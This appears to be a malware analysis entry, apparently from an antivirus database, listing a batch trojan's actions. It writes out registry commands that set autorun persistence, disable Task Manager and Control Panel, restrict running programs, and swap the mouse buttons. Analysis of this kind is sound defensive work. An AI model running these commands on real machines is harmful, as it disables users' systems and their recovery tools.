Техническая информация
- [<HKCU>\Software\Microsoft\Command Processor] 'AutoRun' = '<SYSTEM32>\batinit.bat'
- <SYSTEM32>\msg.exe * "╧Ёюсыхь√ срЄ■э№ :3?"
- <SYSTEM32>\reg.exe add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f
- <SYSTEM32>\reg.exe add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %WINDIR%explorer.exe /f
- <SYSTEM32>\reg.exe add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\1.bat" "
- <SYSTEM32>\reg.exe add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "<SYSTEM32>\batinit.bat" /f
- <SYSTEM32>\rundll32.exe user32, SwapMouseButton
- <SYSTEM32>\batinit.bat
- %TEMP%\1.tmp\1.bat
- %TEMP%\1.tmp\1.bat